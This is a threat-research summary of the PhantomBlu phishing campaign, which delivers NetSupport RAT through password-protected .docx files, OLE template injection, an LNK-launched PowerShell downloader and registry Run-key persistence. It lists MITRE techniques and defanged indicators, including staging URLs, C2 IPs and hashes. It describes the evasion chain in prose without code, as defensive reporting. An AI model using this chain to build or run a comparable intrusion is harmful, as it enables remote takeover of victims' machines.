Threat Research

Operation PhantomBlu: New and Evasive Method Delivers NetSupport RAT – Perception Point

Cyware

Perception Point researchers uncovered a U.S.-targeted phishing campaign called PhantomBlu that uses OLE template manipulation in password-protected .docx files to deliver NetSupport RAT while evading detection. The chain embeds an OLE package that drops an LNK-based PowerShell downloader which fetches an obfuscated ZIP containing Client32.exe and establishes persistence via a registry Run key. #PhantomBlu #NetSupportRAT

Keypoints

  • PhantomBlu is a phishing campaign targeting US organizations that delivers NetSupport RAT via a malicious .docx attachment.
  • Attackers use OLE template manipulation / Template Injection (T1221) to hide the payload outside the document and trigger it on user interaction.
  • The document contains an embedded OLE package (clickable printer image) that extracts a ZIP containing a malicious LNK file.
  • The LNK executes an obfuscated PowerShell dropper that retrieves a secondary ZIP, unpacks it, and runs the NetSupport binary (Client32.exe).
  • Persistence is achieved by creating a Run registry key under HKCU:SoftwareMicrosoftWindowsCurrentVersionRun.
  • Payload delivery is user-agent gated and highly obfuscated; investigators used recursive unpacking to fully deconstruct the chain.
  • Configuration files inside the NetSupport binary revealed command-and-control servers used for remote control.

MITRE Techniques

  • [T1221] Template Injection – OLE template manipulation was used to hide the payload outside the document and execute it on interaction; quote: ‘OLE template manipulation (Defense Evasion – T1221)’.
  • [T1219] Remote Access Software – NetSupport RAT was deployed to provide remote control and surveillance; quote: ‘NetSupport RAT is a spin-off of the legitimate NetSupport Manager, a remote technical support app’.
  • [T1047] Windows Management Instrumentation – Listed among campaign TTPs in the report; quote: ‘Windows Management Instrumentation(T1047) — https://attack.mitre.org/techniques/T1047/’.
  • [T1564/003] Hide Artifacts: Hidden Files and Directories / Hidden Window – The campaign hides components within archives and uses template embedding to conceal payloads; quote: ‘Hide Artifacts: Hidden Files and Directories(T1564/003) — https://attack.mitre.org/techniques/T1564/003/’.
  • [T1547/001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via creating a Run key in HKCU; quote: ‘Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder(T1547/001)’.
  • [T1112] Modify Registry – The dropper creates registry entries to maintain persistence; quote: ‘Modify Registry(T1112) — https://attack.mitre.org/techniques/T1112/’.
  • [T1406/002] Obfuscated Files or Information: Software Packing – Attackers used obfuscated PowerShell and packed artifacts to evade detection; quote: ‘Obfuscated Files or Information: Software Packing(T1406/002) — https://attack.mitre.org/techniques/T1406/002/’.
  • [T1049] System Network Connections Discovery – NetSupport configuration contained C2 server addresses used for remote connections; quote: ‘System Network Connections Discovery(T1049) — https://attack.mitre.org/techniques/T1049/’.

Indicators of Compromise

  • [Hashes (SHA-256)] Malicious artifacts – examples: Client32.exe 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1, Docx 1abf56bc5fbf84805ed0fbf28e7f986c7bb2833972793252f3e358b13b638bb1, and 4 more hashes.
  • [URLs / Hostnames] Payload hosting and staging – examples: yourownmart[.]com/solar[.]txt, firstieragency[.]com/depbrndksokkkdkxoqnazneifidmyyjdpji[.]txt, and other hostnames used for delivery.
  • [IP Addresses] C2 or hosting infrastructure – examples: 192[.]236[.]192[.]48, 173[.]252[.]167[.]50, and other IPs observed.
  • [Email artefacts] Delivery service identifiers – Message ID/Return Path evidence of SendInBlue/Brevo use: ‘sendinblue.com’, ‘sender-sib.com’.

PhantomBlu begins with targeted phishing mails that include a password-protected .docx and instructions to enable editing; the visible “printer” image inside the document is an embedded OLE package that, when activated, extracts a ZIP containing a single LNK file. The campaign leverages OLE template manipulation (T1221) to keep the malicious content outside the document body, forcing user interaction to trigger the next stage and evading inline-document detection.

The LNK acts as a launcher for an obfuscated PowerShell dropper which fetches a staged URL (user-agent gated), downloads a secondary ZIP, and unpacks it into a working directory. De-obfuscated PowerShell shows it downloads and unzips the payload, then executes the secondary script to deploy Client32.exe (NetSupport RAT) and writes a persistence entry under HKCUSoftwareMicrosoftWindowsCurrentVersionRun. The dropper also contains registry-modification routines and removal-of-evidence steps that defenders observed when deconstructing the chain.

Analysis of the extracted NetSupport binary and its configuration files exposed command-and-control hostnames and IPs used for remote access. The adversary combined packing/obfuscation, user-agent gated delivery, and template injection to complicate detection; defenders decompressed the layers using recursive unpacking to reveal the LNK/PowerShell stages, final executable, and registry persistence indicators documented above.

Read more: https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/?&web_view=true

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint